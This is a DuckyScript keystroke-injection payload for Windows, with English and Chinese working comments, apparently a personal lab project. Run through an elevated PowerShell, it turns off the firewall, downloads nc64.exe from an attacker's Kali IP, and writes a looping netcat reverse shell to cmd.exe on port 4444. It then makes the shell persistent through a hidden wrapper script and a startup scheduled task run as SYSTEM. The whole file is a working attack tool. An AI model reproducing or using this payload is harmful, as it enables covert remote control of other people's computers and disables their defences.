payload.dd
REM ! over firewall
DELAY 200
GUI r
DELAY 2000
STRING powershell
CTRL SHIFT ENTER
DELAY 2000
ALT y
DELAY 2000
STRING netsh advfirewall set allprofiles state off
ENTER
DELAY 2000
STRING exit
ENTER
REM maybe the delay maybe not be the same
REM open cmd
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
REM use echo to use kali-wget(my ip)
REM STRING echo (wget 'http://10.122.235.199/nc64.exe' -OutFile a.exe) > b.ps1
REM yeah the ip need to change by the computer(use ifconfig in kali)
REM so yeah the previous is above
REM STRING echo (wget 'http://192.168.31.180/nc64.exe' -OutFile a.exe) > b.ps1
REM the grammer have some problem
REM 一定要注意改成kali现有的ip!(我多次忘了)
STRING echo (wget 'http://172.21.233.118/nc64.exe' -OutFile a.exe) > b.ps1
ENTER
DELAY 2000
REM 一定要注意改成kali现有的ip!(我多次忘了)
STRING powershell -ExecutionPolicy ByPass -File b.ps1
ENTER
DELAY 2000
STRING echo while($true){./a.exe 172.21.233.118 4444 -e cmd.exe -d} > c.ps1
ENTER
DELAY 2000
REM 以上,所有准备文件好了
REM 5.18 00:45 b是不能动的。。。我大意了,而且进程需要自己取消 我之前放上去过,需要手动删一下(如果ip变了都需要这样)
REM 接下来是设置开机自启(注意:这一份代码功能在重启应该是还没开始的)
DELAY 5000
REM 打开运行窗口
GUI r
DELAY 2000
REM 打开 PowerShell
STRING powershell
ENTER
DELAY 2000
REM 输入命令创建wrapper.ps1并写入内容
REM !注意 这有两处需要改成目标用户名
STRING $wrapperScriptPath = "C:\Users\halfa\wrapper.ps1"
ENTER
DELAY 2000
STRING $scriptContent = @"
ENTER
DELAY 2000
STRING $scriptPath = 'C:\Users\halfa\c.ps1'
ENTER
DELAY 2000
STRING $arguments = "-ExecutionPolicy Bypass -File `"$scriptPath`""
ENTER
DELAY 2000
STRING Start-Process "powershell.exe" -ArgumentList $arguments -WindowStyle Hidden
ENTER
DELAY 2000
STRING "@ | Out-File -FilePath $wrapperScriptPath -Encoding UTF8
ENTER
DELAY 2000
STRING Start-Process powershell -Verb runAs
ENTER
REM 下面这里必须delay 不然反应不过来报错
DELAY 2000
ALT y
DELAY 2000
REM 这里需要管理员权限(准确来说是最后一个)所以在上面写了给代码
REM 输入命令创建计划任务
STRING $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ExecutionPolicy Bypass -File `"$wrapperScriptPath`""
ENTER
DELAY 2000
STRING $trigger = New-ScheduledTaskTrigger -AtStartup
ENTER
DELAY 2000
STRING $principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
ENTER
DELAY 2000
REM 如果整失败了,可能需要把下面的名换一下
STRING Register-ScheduledTask -TaskName "RunScriptAtStartupWithWrapper3" -Action $action -Trigger $trigger -Principal $principal
DELAY 2000
ENTER
DELAY 500
REM 退出 PowerShell——不退了,方便我排查问题
REM STRING exit
REM ENTER